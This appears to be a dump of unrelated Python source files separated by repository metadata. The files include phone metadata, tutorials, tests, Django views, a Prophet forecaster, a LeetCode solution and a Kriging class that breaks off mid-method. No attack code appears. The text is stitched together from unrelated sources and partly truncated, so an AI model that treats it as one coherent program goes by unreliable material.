"""Auto-generated file, do not edit by hand. RS metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
PHONE_METADATA_RS = PhoneMetadata(id='RS', country_code=None, international_prefix=None,
general_desc=PhoneNumberDesc(national_number_pattern='[19]\\d{1,5}', possible_number_pattern='\\d{2,6}', possible_length=(2, 3, 4, 5, 6)),
emergency=PhoneNumberDesc(national_number_pattern='112|9[234]', possible_number_pattern='\\d{2,3}', example_number='112', possible_length=(2, 3)),
short_code=PhoneNumberDesc(national_number_pattern='1[189]\\d{1,4}|9[234]', possible_number_pattern='\\d{2,6}', example_number='112', possible_length=(2, 3, 4, 5, 6)),
short_data=True)
|
[
"[email protected]"
] | |
3e94df54d8c79bf66cff5bd9738907713285a1fb
|
4b44a299bafbd4ca408ce1c89c9fe4a449632783
|
/python3/06_Collections/02_Tuples/07_named_tuple_ops.py
|
7ab2152e8002aeee3c28dc99e29bece4712233ce
|
[] |
no_license
|
umunusb1/PythonMaterial
|
ecd33d32b2de664eaaae5192be7c3f6d6bef1d67
|
1e0785c55ccb8f5b9df1978e1773365a29479ce0
|
refs/heads/master
| 2023-01-23T23:39:35.797800 | 2020-12-02T19:29:00 | 2020-12-02T19:29:00 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 625 |
py
|
#!/usr/bin/python
"""
Purpose: Named Tuple ops
"""
from collections import namedtuple
Animal = namedtuple('Animal', 'name age type')
# Assignments
hen = Animal('hen', '2', 'bird')
# 0 1 2
print(hen)
hen = Animal(name='hen', age='2', type='bird')
print(hen)
hen = Animal(age='2', name='hen', type='bird')
print(hen)
# NOTE: Even if the order of values are changes, it can understand
# To get the field names
print(f'{hen._fields =}')
# Accessing values
print()
print('Access By position:', hen[2])
print('Access By key name:', hen.type)
# Converting to dictionary
print(f'{hen._asdict() =}')
|
[
"[email protected]"
] | |
d8e4cca3c4419e249a3fa9dde38edfa30f51ecc2
|
ad13583673551857615498b9605d9dcab63bb2c3
|
/output/instances/msData/modelGroups/mgL001.py
|
96dfeffa0414c3a1c23c80c90bd58d8ab85b987f
|
[
"MIT"
] |
permissive
|
tefra/xsdata-w3c-tests
|
397180205a735b06170aa188f1f39451d2089815
|
081d0908382a0e0b29c8ee9caca6f1c0e36dd6db
|
refs/heads/main
| 2023-08-03T04:25:37.841917 | 2023-07-29T17:10:13 | 2023-07-30T12:11:13 | 239,622,251 | 2 | 0 |
MIT
| 2023-07-25T14:19:04 | 2020-02-10T21:59:47 |
Python
|
UTF-8
|
Python
| false | false | 87 |
py
|
from output.models.ms_data.model_groups.mg_l001_xsd.mg_l001 import Doc
obj = Doc(
)
|
[
"[email protected]"
] | |
99af65cd755f1a45ecd11c1d5788f55eb7defc0f
|
82c0a53e60106e978f8236fd42e4d2ed18d897d7
|
/data_anlys.py
|
dbb877dd43ed90b6eba8ba16d7595f95619b8d58
|
[] |
no_license
|
hasnatosman/data_visualization
|
c3691dd9f6fb25394725651c0500ee3bcd5ad7b1
|
34cf0483cddf450289c68135ec39201de3dd6311
|
refs/heads/main
| 2023-06-08T02:09:58.329997 | 2021-06-25T17:42:02 | 2021-06-25T17:42:02 | 380,313,450 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 72 |
py
|
import pandas as pd
df = pd.read_csv('pokemon_data.csv')
print(df)
|
[
"[email protected]"
] | |
0de9739f74e58c61be4f017af3e9f07f596a8e84
|
1a3228de688754e6c58f248eecfbfdd77c60e72f
|
/docs/test_asyncio.py
|
bc288e45631d8804ad67aab78bf222f8558c1f31
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
ArtemSerga/hiku
|
c38d8b4a4fe7ed780680dbe7969652233306a1a3
|
90e7cc50e2754d5dfdc06a6c2f5c6cc55e634566
|
refs/heads/master
| 2021-01-23T12:46:45.568208 | 2017-06-03T16:40:01 | 2017-06-03T16:40:01 | 93,199,117 | 0 | 0 | null | 2017-06-02T19:52:02 | 2017-06-02T19:52:02 | null |
UTF-8
|
Python
| false | false | 7,346 |
py
|
import uuid
import pytest
import asyncio
# setup storage
from sqlalchemy import MetaData, Table, Column
from sqlalchemy import Integer, String, ForeignKey, select
from sqlalchemy.sql.ddl import CreateTable
metadata = MetaData()
character_table = Table(
'character',
metadata,
Column('id', Integer, primary_key=True),
Column('name', String),
Column('species', String),
)
actor_table = Table(
'actor',
metadata,
Column('id', Integer, primary_key=True),
Column('name', String),
Column('character_id', ForeignKey('character.id'), nullable=False),
)
# setup test environment
import aiopg.sa
async def init_db(pg_dsn, *, loop):
db_name = 'test_{}'.format(uuid.uuid4().hex)
async with aiopg.sa.create_engine(pg_dsn, loop=loop) as db_engine:
async with db_engine.acquire() as conn:
await conn.execute('CREATE DATABASE {0}'.format(db_name))
return db_name
async def setup_db(db_dsn, *, loop):
async with aiopg.sa.create_engine(db_dsn, loop=loop) as db_engine:
async with db_engine.acquire() as conn:
await conn.execute(CreateTable(character_table))
await conn.execute(CreateTable(actor_table))
await conn.execute(character_table.insert().values([
dict(id=1, name='James T. Kirk', species='Human'),
dict(id=2, name='Spock', species='Vulcan/Human'),
dict(id=3, name='Leonard McCoy', species='Human'),
]))
await conn.execute(actor_table.insert().values([
dict(id=1, character_id=1, name='William Shatner'),
dict(id=2, character_id=2, name='Leonard Nimoy'),
dict(id=3, character_id=3, name='DeForest Kelley'),
dict(id=4, character_id=1, name='Chris Pine'),
dict(id=5, character_id=2, name='Zachary Quinto'),
dict(id=6, character_id=3, name='Karl Urban'),
]))
async def drop_db(pg_dsn, db_name, *, loop):
async with aiopg.sa.create_engine(pg_dsn, loop=loop) as db_engine:
async with db_engine.acquire() as conn:
await conn.execute('DROP DATABASE {0}'.format(db_name))
@pytest.fixture(scope='session', name='db_dsn')
def db_dsn_fixture(request):
loop = asyncio.get_event_loop()
pg_dsn = 'postgresql://postgres:postgres@postgres:5432/postgres'
db_name = loop.run_until_complete(init_db(pg_dsn, loop=loop))
db_dsn = 'postgresql://postgres:postgres@postgres:5432/{}'.format(db_name)
loop.run_until_complete(setup_db(db_dsn, loop=loop))
def fin():
loop.run_until_complete(drop_db(pg_dsn, db_name, loop=loop))
request.addfinalizer(fin)
return db_dsn
# define graph
from hiku.graph import Graph, Root, Node, Link
from hiku.types import TypeRef, Sequence
from hiku.engine import pass_context
from hiku.sources import aiopg as sa
SA_ENGINE_KEY = 'sa-engine'
character_query = sa.FieldsQuery(SA_ENGINE_KEY, character_table)
actor_query = sa.FieldsQuery(SA_ENGINE_KEY, actor_table)
character_to_actors_query = sa.LinkQuery(Sequence[TypeRef['actor']], SA_ENGINE_KEY,
from_column=actor_table.c.character_id,
to_column=actor_table.c.id)
async def direct_link(ids):
return ids
@pass_context
async def to_characters_query(ctx):
query = select([character_table.c.id])
async with ctx[SA_ENGINE_KEY].acquire() as conn:
rows = await conn.execute(query)
return [row.id for row in rows]
@pass_context
async def to_actors_query(ctx):
query = select([actor_table.c.id])
async with ctx[SA_ENGINE_KEY].acquire() as conn:
rows = await conn.execute(query)
return [row.id for row in rows]
GRAPH = Graph([
Node('character', [
sa.Field('id', character_query),
sa.Field('name', character_query),
sa.Field('species', character_query),
sa.Link('actors', character_to_actors_query, requires='id'),
]),
Node('actor', [
sa.Field('id', actor_query),
sa.Field('name', actor_query),
sa.Field('character_id', actor_query),
Link('character', TypeRef['character'],
direct_link, requires='character_id'),
]),
Root([
Link('characters', Sequence[TypeRef['character']],
to_characters_query, requires=None),
Link('actors', Sequence[TypeRef['actor']],
to_actors_query, requires=None),
]),
])
# test graph
import aiopg.sa
from hiku.engine import Engine
from hiku.result import denormalize
from hiku.readers.simple import read
from hiku.executors.asyncio import AsyncIOExecutor
async def execute(hiku_engine, sa_engine, graph, query_string):
query = read(query_string)
result = await hiku_engine.execute(graph, query, {SA_ENGINE_KEY: sa_engine})
return denormalize(graph, result, query)
@pytest.mark.asyncio(forbid_global_loop=True)
async def test_character_to_actors(db_dsn, event_loop):
hiku_engine = Engine(AsyncIOExecutor(event_loop))
async with aiopg.sa.create_engine(db_dsn, loop=event_loop) as sa_engine:
result = await execute(hiku_engine, sa_engine, GRAPH,
'[{:characters [:name {:actors [:name]}]}]')
assert result == {
'characters': [
{
'name': 'James T. Kirk',
'actors': [
{'name': 'William Shatner'},
{'name': 'Chris Pine'},
],
},
{
'name': 'Spock',
'actors': [
{'name': 'Leonard Nimoy'},
{'name': 'Zachary Quinto'},
],
},
{
'name': 'Leonard McCoy',
'actors': [
{'name': 'DeForest Kelley'},
{'name': 'Karl Urban'},
],
},
],
}
@pytest.mark.asyncio(forbid_global_loop=True)
async def test_actor_to_character(db_dsn, event_loop):
hiku_engine = Engine(AsyncIOExecutor(event_loop))
async with aiopg.sa.create_engine(db_dsn, loop=event_loop) as sa_engine:
result = await execute(hiku_engine, sa_engine, GRAPH,
'[{:actors [:name {:character [:name]}]}]')
assert result == {
'actors': [
{
'name': 'William Shatner',
'character': {'name': 'James T. Kirk'},
},
{
'name': 'Leonard Nimoy',
'character': {'name': 'Spock'},
},
{
'name': 'DeForest Kelley',
'character': {'name': 'Leonard McCoy'},
},
{
'name': 'Chris Pine',
'character': {'name': 'James T. Kirk'},
},
{
'name': 'Zachary Quinto',
'character': {'name': 'Spock'},
},
{
'name': 'Karl Urban',
'character': {'name': 'Leonard McCoy'},
},
],
}
|
[
"[email protected]"
] | |
e72c7937c256545ad06b5ab6bfadcaaa59a4f708
|
ab4de1c8caf95571be1e29e2c44272080cbf79be
|
/2018-07-10/diamantes.py
|
6d95056c2bf5fb62708f3684e794901c397e63a5
|
[] |
no_license
|
grupydf/dojos
|
f1c3cf7ad941b93efe875500e1bd18c914cfd372
|
ea79079a71dfb43b858acebc028de7f61b0e4177
|
refs/heads/master
| 2021-01-18T16:29:57.786827 | 2020-05-10T19:57:17 | 2020-05-10T19:57:17 | 20,621,041 | 5 | 6 | null | 2020-05-10T19:57:19 | 2014-06-08T16:38:55 |
Python
|
UTF-8
|
Python
| false | false | 862 |
py
|
"""
diamante('c')
a
b b
c c
b b
a
"""
listaTemp = []
abcedario = ['a', 'b', 'c', 'd', ]
alfabeto = 'abcdefghijklmnopqrstuvwxyz'
j = 0
lista2 = []
k = 0
def sequencia(letra):
index = alfabeto.find(letra)
lista = list(alfabeto[:index])
return lista + [letra] + lista[::-1]
"""
for i in alfabeto:
if letra != i:
listaTemp.append(i)
else:
listaTemp.append(i)
break
j=len(listaTemp)
j = j-1
lista2 = listaTemp.copy()
while j > k :
lista2.append(listaTemp[j-1])
j = j - 1
return lista2
"""
def test_sequence_a():
assert sequencia('a') == ['a']
def test_sequence_b():
assert sequencia('b') == ['a', 'b', 'a']
def test_sequence_c():
assert sequencia('c') == ['a', 'b', 'c', 'b', 'a']
|
[
"[email protected]"
] | |
17111326eafe9c7e22bb9fbee83b1687511d8bd6
|
d55937a3fe1490c43f509267081a6ef0122131d1
|
/predictions.py
|
fbf2ca8d7907dffa70c5a48c492187da315e655b
|
[] |
no_license
|
kennethreitz/coinbin.org
|
e45abb9a00ae968365f057d7b0f44451d3ef52c7
|
bc3232fe5157363240a394a564d96f0500605e38
|
refs/heads/master
| 2022-05-26T01:02:16.111756 | 2018-01-12T22:20:19 | 2018-01-12T22:20:19 | 101,120,306 | 276 | 40 | null | 2018-01-12T22:20:20 | 2017-08-23T00:43:00 |
Python
|
UTF-8
|
Python
| false | false | 2,131 |
py
|
import time
import uuid
import records
import os
import maya
import numpy as np
import pandas as pd
# Matplotlib hack.
import matplotlib
matplotlib.use('agg')
import mpld3
from fbprophet import Prophet
from scraper import Coin, MWT, convert_to_decimal
PERIODS = 30
GRAPH_PERIODS = 365
@MWT(timeout=300)
def get_predictions(coin, render=False):
"""Returns a list of predictions, unless render is True.
Otherwise, returns the path of a rendered image.
"""
c = Coin(coin)
q = "SELECT date as ds, value as y from api_coin WHERE name=:coin"
db = records.Database()
rows = db.query(q, coin=c.name)
df = rows.export('df')
df['y_orig'] = df['y'] # to save a copy of the original data..you'll see why shortly.
# log-transform y
df['y'] = np.log(df['y'])
model = Prophet(weekly_seasonality=True, yearly_seasonality=True)
model.fit(df)
periods = PERIODS if not render else GRAPH_PERIODS
future_data = model.make_future_dataframe(periods=periods, freq='d')
forecast_data = model.predict(future_data)
if render:
matplotlib.pyplot.gcf()
fig = model.plot(forecast_data, xlabel='Date', ylabel='log($)')
return mpld3.fig_to_html(fig)
forecast_data_orig = forecast_data # make sure we save the original forecast data
forecast_data_orig['yhat'] = np.exp(forecast_data_orig['yhat'])
forecast_data_orig['yhat_lower'] = np.exp(forecast_data_orig['yhat_lower'])
forecast_data_orig['yhat_upper'] = np.exp(forecast_data_orig['yhat_upper'])
df['y_log'] = df['y'] #copy the log-transformed data to another column
df['y'] = df['y_orig'] #copy the original data to 'y'
# print(forecast_data_orig)
d = forecast_data_orig['yhat'].to_dict()
predictions = []
for i, k in enumerate(list(d.keys())[-PERIODS:]):
w = maya.when(f'{i+1} days from now')
predictions.append({
'when': w.slang_time(),
'timestamp': w.iso8601(),
'usd': convert_to_decimal(d[k]),
})
return predictions
if __name__ == '__main__':
print(get_predictions('btc'))
|
[
"[email protected]"
] | |
9d0105951ac244b0c59503e22b216fcdfab8e881
|
90c6262664d013d47e9a3a9194aa7a366d1cabc4
|
/tests/storage/cases/test_KT18vyxUB9haRHR4YLKizkbnsY8Wdm7C8JuA.py
|
d79748b5bc4a12c3f19b31fdefaf91282de497fa
|
[
"MIT"
] |
permissive
|
tqtezos/pytezos
|
3942fdab7aa7851e9ea81350fa360180229ec082
|
a4ac0b022d35d4c9f3062609d8ce09d584b5faa8
|
refs/heads/master
| 2021-07-10T12:24:24.069256 | 2020-04-04T12:46:24 | 2020-04-04T12:46:24 | 227,664,211 | 1 | 0 |
MIT
| 2020-12-30T16:44:56 | 2019-12-12T17:47:53 |
Python
|
UTF-8
|
Python
| false | false | 1,130 |
py
|
from unittest import TestCase
from tests import get_data
from pytezos.michelson.converter import build_schema, decode_micheline, encode_micheline, micheline_to_michelson
class StorageTestKT18vyxUB9haRHR4YLKizkbnsY8Wdm7C8JuA(TestCase):
@classmethod
def setUpClass(cls):
cls.maxDiff = None
cls.contract = get_data('storage/zeronet/KT18vyxUB9haRHR4YLKizkbnsY8Wdm7C8JuA.json')
def test_storage_encoding_KT18vyxUB9haRHR4YLKizkbnsY8Wdm7C8JuA(self):
type_expr = self.contract['script']['code'][1]
val_expr = self.contract['script']['storage']
schema = build_schema(type_expr)
decoded = decode_micheline(val_expr, type_expr, schema)
actual = encode_micheline(decoded, schema)
self.assertEqual(val_expr, actual)
def test_storage_schema_KT18vyxUB9haRHR4YLKizkbnsY8Wdm7C8JuA(self):
_ = build_schema(self.contract['script']['code'][0])
def test_storage_format_KT18vyxUB9haRHR4YLKizkbnsY8Wdm7C8JuA(self):
_ = micheline_to_michelson(self.contract['script']['code'])
_ = micheline_to_michelson(self.contract['script']['storage'])
|
[
"[email protected]"
] | |
e404d3c0651791aa020ed888a4d41d540052a404
|
acb8e84e3b9c987fcab341f799f41d5a5ec4d587
|
/langs/5/nco.py
|
d978a0c9ddb04b0df5db8a265cd41b474772a578
|
[] |
no_license
|
G4te-Keep3r/HowdyHackers
|
46bfad63eafe5ac515da363e1c75fa6f4b9bca32
|
fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2
|
refs/heads/master
| 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 486 |
py
|
import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'nCO':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1])
|
[
"[email protected]"
] | |
d398d48c8080f72fa8318e8bace03ec75d59c088
|
acf7457d3a799cb9bff12686d2d616688bcd4b5b
|
/packages/python/plotly/plotly/validators/splom/marker/colorbar/_ticklabelstep.py
|
60e50e822cdfe58fb01e5adc7eecda99cb369c3c
|
[
"MIT"
] |
permissive
|
plotly/plotly.py
|
f4f61639f08160f16195efc95b5901dc5a937346
|
975a704074f01c078e0fdfa32bdf17130bf89e69
|
refs/heads/master
| 2023-09-06T06:15:08.340035 | 2023-08-24T12:28:14 | 2023-08-24T12:28:14 | 14,579,099 | 14,751 | 2,989 |
MIT
| 2023-09-08T19:55:32 | 2013-11-21T05:53:08 |
Python
|
UTF-8
|
Python
| false | false | 487 |
py
|
import _plotly_utils.basevalidators
class TicklabelstepValidator(_plotly_utils.basevalidators.IntegerValidator):
def __init__(
self, plotly_name="ticklabelstep", parent_name="splom.marker.colorbar", **kwargs
):
super(TicklabelstepValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "colorbars"),
min=kwargs.pop("min", 1),
**kwargs,
)
|
[
"[email protected]"
] | |
d5ab8cba4a8c372c31f9f94079edb50e6fae9033
|
0ccd29f678d3b88832eac8b6b577cb32ee1c0653
|
/chaco/chaco_traits.py
|
8b1ae8d2cc554ef3eb42d64b3d1c8efe49ef7629
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-public-domain"
] |
permissive
|
martinRenou/chaco
|
7f0bc36619268f024bc5ea1e62178d5ef77f4b6e
|
1888da3ecee89f9b2d11900cda9333b32fc5e89a
|
refs/heads/master
| 2020-07-21T03:40:17.652867 | 2019-09-01T12:12:04 | 2019-09-01T12:12:04 | 206,750,733 | 0 | 0 |
NOASSERTION
| 2019-09-06T08:36:50 | 2019-09-06T08:36:50 | null |
UTF-8
|
Python
| false | false | 796 |
py
|
""" Defines various traits that are used in many places in Chaco.
"""
# Enthought library imports
from traits.api import Enum
#----------------------------------------------------------------------------
# Box positioning traits: used to specify positions of boxes relative to
# one another. Generally used for layout.
#----------------------------------------------------------------------------
box_edge_enum = Enum("left", "right", "top", "bottom")
# Values correspond to: top, bottom, left, right, top left, top right, bottom
# left, bottom right
box_position_enum = Enum("T", "B", "L", "R", "TL", "TR", "BL", "BR")
# For backwards compatibility, import LineStyle & LineStyleEditor from enable.
# (They used to be defined here.)
from enable.api import LineStyle, LineStyleEditor
# EOF
|
[
"[email protected]"
] | |
201ccbd6e28d692a9e14c5f2478ed25401e276b1
|
08e052c0c2ee4ad0cd4980fbc8a692c407118659
|
/venv/bin/chardetect
|
e40b7008dff3ce3f22024dfecbd68230af3a2b76
|
[] |
no_license
|
miltonleal/MAC0110_Introduction_Computer_Science_IME_USP
|
6fad182f7fbb3e83403080800074bf57456cb0b5
|
b47936ce66e715dba79dff44779a750d795192a0
|
refs/heads/master
| 2023-03-04T11:06:48.092980 | 2021-02-17T14:47:46 | 2021-02-17T14:47:46 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 259 |
#!/Users/admin/PycharmProjects/MAC110/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from chardet.cli.chardetect import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"[email protected]"
] | ||
6b977a8c07dfe5e184c2f3e20aa3b4c488859dfe
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03838/s376717183.py
|
4bdb937150e0dcdff3a481bbfa20fc4825cb3304
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 962 |
py
|
import sys, re
from collections import deque, defaultdict, Counter
from math import ceil, sqrt, hypot, factorial, pi, sin, cos, radians
from itertools import accumulate, permutations, combinations, product
from operator import itemgetter, mul
from copy import deepcopy
from string import ascii_lowercase, ascii_uppercase, digits
from bisect import bisect, bisect_left
from fractions import gcd
from heapq import heappush, heappop
from functools import reduce
def input(): return sys.stdin.readline().strip()
def INT(): return int(input())
def MAP(): return map(int, input().split())
def LIST(): return list(map(int, input().split()))
def ZIP(n): return zip(*(MAP() for _ in range(n)))
sys.setrecursionlimit(10 ** 9)
INF = float('inf')
mod = 10 ** 9 + 7
x, y = MAP()
if x*y < 0:
print(1+abs(abs(x)-abs(y)))
elif x == 0 or y == 0:
if x < y:
print(max(abs(x), abs(y)))
else:
print(1+max(abs(x), abs(y)))
else:
if y > x:
print(y-x)
else:
print(2+x-y)
|
[
"[email protected]"
] | |
84cd6d0ec245d8c1be7c030aafca4fa7e34c996e
|
ea8f71a9a609f15f42bff595bb467722791244a7
|
/todo/views.py
|
7f489b3f455874f44a52039e8b726be1db9ae581
|
[] |
no_license
|
Roderich25/pythonanywhereapp
|
aafe600cd33c69347655b685f4b792038196aede
|
1bd46136e316ea175441ce14a722ddf5b266f767
|
refs/heads/master
| 2023-05-11T09:37:11.888269 | 2019-10-21T13:24:00 | 2019-10-21T13:24:00 | 216,573,629 | 0 | 0 | null | 2023-04-21T20:39:16 | 2019-10-21T13:21:21 |
Python
|
UTF-8
|
Python
| false | false | 1,017 |
py
|
from django.shortcuts import render, redirect
from .models import Todo
from .forms import TodoForm, NewTodoForm
from django.views.decorators.http import require_POST
def index(request):
# form = TodoForm()
form = NewTodoForm()
todo_list = Todo.objects.order_by('-id')
context = {"todo_list": todo_list, "form": form}
return render(request, 'todo/index.html', context=context)
@require_POST
def add_todo(request):
# form = TodoForm(request.POST)
form = NewTodoForm(request.POST)
if form.is_valid():
# new_todo = Todo(text=form.cleaned_data['text'])
# new_todo.save()
form.save()
return redirect('index')
def todo_completed(request, todo_id):
todo = Todo.objects.get(pk=todo_id)
todo.completed = True
todo.save()
return redirect('index')
def delete_completed(request):
Todo.objects.filter(completed=True).delete()
return redirect('index')
def delete_all(request):
Todo.objects.all().delete()
return redirect('index')
|
[
"[email protected]"
] | |
80bb4b70c97cfbda2f8175dc88f4e6e29922de08
|
d2c4934325f5ddd567963e7bd2bdc0673f92bc40
|
/tests/model_control/detailed/transf_Quantization/model_control_one_enabled_Quantization_PolyTrend_Seasonal_DayOfMonth_LSTM.py
|
bae3999426ca9e05b0f4c9111fc8851a700d1b80
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
jmabry/pyaf
|
797acdd585842474ff4ae1d9db5606877252d9b8
|
afbc15a851a2445a7824bf255af612dc429265af
|
refs/heads/master
| 2020-03-20T02:14:12.597970 | 2018-12-17T22:08:11 | 2018-12-17T22:08:11 | 137,104,552 | 0 | 0 |
BSD-3-Clause
| 2018-12-17T22:08:12 | 2018-06-12T17:15:43 |
Python
|
UTF-8
|
Python
| false | false | 171 |
py
|
import pyaf.tests.model_control.test_ozone_custom_models_enabled as testmod
testmod.build_model( ['Quantization'] , ['PolyTrend'] , ['Seasonal_DayOfMonth'] , ['LSTM'] );
|
[
"[email protected]"
] | |
28c9709a759eca89ba9fd8190f371c4e58acd657
|
bfa51f4adc2e2a84c98b3bd02e446a1d8a2fd663
|
/mtrack/views/facility_locations.py
|
f3f827bf39313783eb50cfe58c0a4a8320177745
|
[] |
no_license
|
unicefuganda/rapidsms-mtrack
|
a47f7b1a89240fb1c9145bc4dcbb950f1e35df95
|
a03cc6cf46a73620e0eb1bc3fe67816d9029f2d6
|
refs/heads/master
| 2021-05-16T02:25:01.278824 | 2019-07-10T18:42:22 | 2019-07-10T18:42:22 | 2,011,844 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,895 |
py
|
import datetime
from django.template import RequestContext
from django.shortcuts import redirect, get_object_or_404, render_to_response
from rapidsms.contrib.locations.models import Location
from healthmodels.models.HealthFacility import HealthFacility
from rapidsms_httprouter.models import Message
from django.http import HttpResponse
from django.utils import simplejson
from django.conf import settings
def facility_cas(request):
#consider a list
locs = Location.objects.filter(type__name='district').values_list('name',flat=True)
locs = [l.upper() for l in locs]
districts = Location.objects.filter(type__name='district').values('id', 'name').order_by('name')
#facilities = HealthFacility.objects.all().values('id', 'name', 'type__slug').order_by('name')
facilities = [(0, 'Select Facility')]
if request.method == 'POST':
pass
else:
pass
return render_to_response('mtrack/facility_locations.html', {'districts': districts,
'facilities': facilities,
},
context_instance=RequestContext(request))
def ajax_portal2(request):
xtype = request.GET.get('xtype', '')
xid = request.GET.get('xid', '')
if xtype == 'district':
district_locs = Location.objects.get(pk=xid).get_descendants(include_self=True)
facilities = list(HealthFacility.objects.filter(catchment_areas__in=district_locs).\
values('id', 'name', 'type__slug').order_by('name').distinct())
response = facilities
elif xtype == 'facility':
response = list(HealthFacility.objects.get(pk=xid).catchment_areas.all().values('name','type'))
else:
response = []
json = simplejson.dumps(response)
return HttpResponse(json, mimetype='application/json')
|
[
"[email protected]"
] | |
357f0f3acd183afa00d04846c89e4cf6dc948676
|
e94c3e02b390b7c37214218083e4c5b2ad622f60
|
/算法与数据结构/LeetCode/动态规划(DP)/968.监控二叉树.py
|
530702ab36f40a07726d0e3b8f30b2727950cbd3
|
[
"MIT"
] |
permissive
|
nomore-ly/Job
|
1160e341d9c78c2f99846995893f0289f4e56cf6
|
ff4fd24447e30e2d17f15696842e214fba7ad61b
|
refs/heads/master
| 2023-06-21T00:23:47.594204 | 2021-07-23T07:29:47 | 2021-07-23T07:29:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 725 |
py
|
#
# @lc app=leetcode.cn id=968 lang=python3
#
# [968] 监控二叉树
#
# @lc code=start
# Definition for a binary tree node.
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def minCameraCover(self, root: TreeNode) -> int:
def dfs(root: TreeNode) -> List[int]:
if not root:
return [float("inf"), 0, 0]
la, lb, lc = dfs(root.left)
ra, rb, rc = dfs(root.right)
a = lc + rc + 1
b = min(a, la + rb, ra + lb)
c = min(a, lb + rb)
return [a, b, c]
a, b, c = dfs(root)
return b
# @lc code=end
|
[
"[email protected]"
] | |
2c8e6d3328b1b0201a0de2960ec5aa1b14674ed3
|
3db1c06cd10d4a72c3e778006364d5a83d1c5e2c
|
/subisuhostcheck/djangomonitoring/kitsune/management/commands/kitsune_run_job.py
|
4362fb85945fc4d9a3c90dc6185ecf600ab9a68d
|
[] |
no_license
|
shaktijeet-ego/hostdown
|
14f07d309c0346ea0a67d321d774a788d2a1b75e
|
9eab7ff08746c0c276bdc46bd1f52d2f02d7d2bb
|
refs/heads/master
| 2023-04-05T19:22:57.064463 | 2021-04-28T03:35:34 | 2021-04-28T03:35:34 | 353,187,372 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 780 |
py
|
import sys
from django.core.management import call_command
from django.core.management.base import BaseCommand
from kitsune.models import Job, Log
class Command(BaseCommand):
help = 'Runs a specific job. The job will only run if it is not currently running.'
args = "job.id"
def handle(self, *args, **options):
try:
job_id = args[0]
except IndexError:
sys.stderr.write("This command requires a single argument: a job id to run.\n")
return
try:
job = Job.objects.get(pk=job_id)
except Job.DoesNotExist:
sys.stderr.write("The requested Job does not exist.\n")
return
# Run the job and wait for it to finish
job.handle_run()
|
[
"[email protected]"
] | |
b8a39e4b237775fa112b8b08084ab7469ea8f0e7
|
a9e051485379fb7e569a7c8458045e9eb56d4cf8
|
/surrogate/estimator/kriging.py
|
357dcc5bdc81b8748f80326eee090c87827710c9
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
liujiamingustc/phd
|
7634056500c481d39fa036bf0ed744c1d13b0035
|
4f815a738abad43531d02ac66f5bd0d9a1def52a
|
refs/heads/master
| 2020-05-17T07:02:56.000146 | 2019-04-24T15:04:19 | 2019-04-24T15:04:19 | 183,567,207 | 4 | 0 | null | 2019-04-26T06:04:37 | 2019-04-26T06:04:37 | null |
UTF-8
|
Python
| false | false | 6,594 |
py
|
# Copyright 2016 Quan Pan
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Quan Pan <[email protected]>
# License: Apache License, Version 2.0
# Create: 2016-12-02
""" Surrogate model based on Kriging. """
from math import log
from surrogate.base import SurrogateModel
# pylint: disable-msg=E0611,F0401
from numpy import zeros, dot, ones, eye, abs, exp, log10, diagonal, \
prod, square, column_stack, ndarray, sqrt, inf, einsum, sum, power
from numpy.linalg import slogdet, linalg
from numpy.dual import lstsq
from scipy.linalg import cho_factor, cho_solve
from scipy.optimize import minimize
class KrigingSurrogate(SurrogateModel):
"""Surrogate Modeling method based on the simple Kriging interpolation.
Predictions are returned as a tuple of mean and RMSE
"""
def __init__(self):
super(KrigingSurrogate, self).__init__()
self.m = 0 # number of independent
self.n = 0 # number of training points
self.thetas = zeros(0)
self.nugget = 0 # nugget smoothing parameter from [Sasena, 2002]
self.R = zeros(0)
self.R_fact = None
self.R_solve_ymu = zeros(0)
self.R_solve_one = zeros(0)
self.mu = zeros(0)
self.log_likelihood = inf
# Training Values
self.X = zeros(0)
self.Y = zeros(0)
def fit(self, x, y):
"""Train the surrogate model with the given set of inputs and outputs.
:param x: Training input locations
:param y: Model responses at given inputs.
"""
